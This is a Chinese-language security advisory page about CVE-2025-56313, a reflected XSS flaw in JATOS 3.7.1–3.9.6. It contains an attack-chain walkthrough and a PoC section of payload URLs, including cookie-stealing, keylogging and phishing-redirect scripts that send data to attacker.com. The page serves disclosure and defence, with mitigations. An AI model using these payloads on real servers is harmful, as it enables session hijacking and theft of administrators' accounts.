IPBUF安全漏洞报告
English
CVE-2025-56313 CVSS 6.1 中危

CVE-2025-56313 JATOS 3.9.6反射型XSS漏洞

披露日期: 2025-10-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-56313
漏洞类型
反射型跨站脚本攻击(XSS)
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
JATOS

相关标签

CVE-2025-56313反射型XSS跨站脚本攻击JATOSWeb应用安全会话劫持权限提升中危漏洞

漏洞概述

CVE-2025-56313是JATOS(一个用于在线行为研究的开源平台)中发现的中危反射型跨站脚本(XSS)漏洞。该漏洞存在于JATOS 3.7.1至3.9.6版本中的/publix/run端点,攻击者可通过在URL的code参数中注入恶意JavaScript代码来触发此漏洞。当已认证的管理员用户访问包含恶意载荷的研究链接时,攻击者注入的脚本会在用户浏览器中执行,可能导致未经授权的操作、账户劫持和权限提升等严重后果。由于该漏洞无需认证即可发起攻击,且利用复杂度较低,对使用受影响版本JATOS的组织构成一定安全风险。

技术细节

该漏洞为典型的反射型XSS(Reflected Cross-Site Scripting)漏洞。攻击原理如下:1)JATOS的/publix/run端点直接将从URL参数(code)获取的用户输入未经充分过滤或转义即返回到HTTP响应中;2)攻击者构造包含恶意JavaScript代码的链接,如/publix/run?code=<script>alert(document.cookie)</script>;3)当受害者(特别是已认证的管理员用户)点击该恶意链接时,浏览器会解析并执行响应中的恶意脚本;4)由于管理员具有较高权限,攻击者可利用窃取的会话Cookie、执行的任意操作或植入的持久性载荷来进一步渗透系统。漏洞利用的关键在于JATOS未对code参数进行HTML实体编码,导致JavaScript代码被浏览器解析执行。

攻击链分析

STEP 1
步骤1
信息收集:攻击者识别目标JATOS服务器版本,确认其属于3.7.1至3.9.6版本范围
STEP 2
步骤2
载荷构造:攻击者构造包含恶意JavaScript代码的/publix/run端点链接,使用code参数注入XSS payload
STEP 3
步骤3
社会工程:攻击者通过钓鱼邮件、即时消息或其他渠道诱骗目标管理员用户点击该恶意链接
STEP 4
步骤4
漏洞触发:管理员用户浏览器访问恶意链接,服务器将未过滤的code参数值反射回响应页面
STEP 5
步骤5
脚本执行:浏览器解析响应内容,执行注入的恶意JavaScript代码,攻击者获取用户会话信息或执行特权操作
STEP 6
步骤6
权限提升:攻击者利用窃取的认证信息进一步控制JATOS系统,可能获取研究数据或管理权限

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-56313 PoC - JATOS Reflected XSS --> <!-- Target: JATOS 3.7.1 - 3.9.6 --> <!-- Endpoint: /publix/run --> <!-- Parameter: code --> <!-- Basic XSS PoC --> https://target-jatos-server/publix/run?code=<script>alert('XSS')</script> <!-- Cookie Stealing PoC --> https://target-jatos-server/publix/run?code=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> <!-- Session Hijacking PoC --> https://target-jatos-server/publix/run?code=<img src=x onerror="fetch('https://attacker.com/log?cookie='+btoa(document.cookie))"> <!-- Keylogger PoC --> https://target-jatos-server/publix/run?code=<script>document.onkeypress=function(e){fetch('https://attacker.com/k?k='+e.key)}</script> <!-- Phishing Redirect PoC --> https://target-jatos-server/publix/run?code=<script>window.location='https://attacker.com/phishing'</script>

影响范围

JATOS >= 3.7.1 且 <= 3.9.6

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时缓解措施:1)使用Web应用防火墙规则阻止包含<script>标签或JavaScript事件处理器的请求;2)对/publix/run端点实施访问控制,限制匿名访问;3)配置HTTP安全响应头(如X-XSS-Protection、X-Content-Type-Options);4)监控JATOS服务器的异常访问日志;5)提醒管理员用户不要点击未知来源的研究链接;6)考虑临时禁用非必要的研究链接分享功能。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表